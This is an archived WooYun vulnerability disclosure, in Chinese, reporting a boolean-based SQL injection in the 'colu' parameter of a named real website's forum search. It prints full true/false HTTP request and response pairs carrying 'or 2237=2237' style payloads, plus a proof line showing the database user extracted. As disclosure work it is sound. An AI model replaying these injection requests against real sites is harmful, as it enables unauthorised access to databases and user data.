乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-28: 细节已通知厂商并且等待厂商处理中 2015-02-28: 厂商已经确认,细节仅向厂商公开 2015-03-10: 细节向核心白帽子及相关领域专家公开 2015-03-20: 细节向普通白帽子公开 2015-03-30: 细节向实习白帽子公开 2015-04-14: 细节向公众公开
网站:plus.aili.com这个是or型注入,参数colu,返回所有数据为true,空json为falseTRUE:
GET /topicLab/index.php?m=ForumSearch&colu=200471820820%20or%202237%3d2237&callback=jsonp1424483691772 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Referer: http://club.aili.com/lifestyle/Cache-Control: no-cacheX-Forwarded-For: 127.0.0.1Host: plus.aili.comAccept-Encoding: gzip, deflateHTTP/1.1 200 OKDate: Sat, 21 Feb 2015 01:58:00 GMTServer: By AILI/3.3Content-Type: text/html; charset=gbkX-Powered-By: PHP/5.2.14p1Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheX-Via: 1.1 jsycdx96:4 (Cdn Cache Server V2.0)Connection: keep-aliveContent-Length: 181689
FALSE:
GET /topicLab/index.php?m=ForumSearch&colu=200471820820%20or%202237%3d2238&callback=jsonp1424483691772 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Referer: http://club.aili.com/lifestyle/Cache-Control: no-cacheX-Forwarded-For: 127.0.0.1Host: plus.aili.comAccept-Encoding: gzip, deflateHTTP/1.1 200 OKDate: Sat, 21 Feb 2015 01:58:01 GMTServer: By AILI/3.3Content-Type: text/html; charset=gbkX-Powered-By: PHP/5.2.14p1Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheX-Via: 1.1 jsycdx96:4 (Cdn Cache Server V2.0)Connection: keep-aliveContent-Length: 22jsonp1424483691772([])
POC:user()='[email protected]'
危害等级:中
漏洞Rank:10
确认时间:2015-02-28 18:09
保卫内裤,从我坐骑……
暂无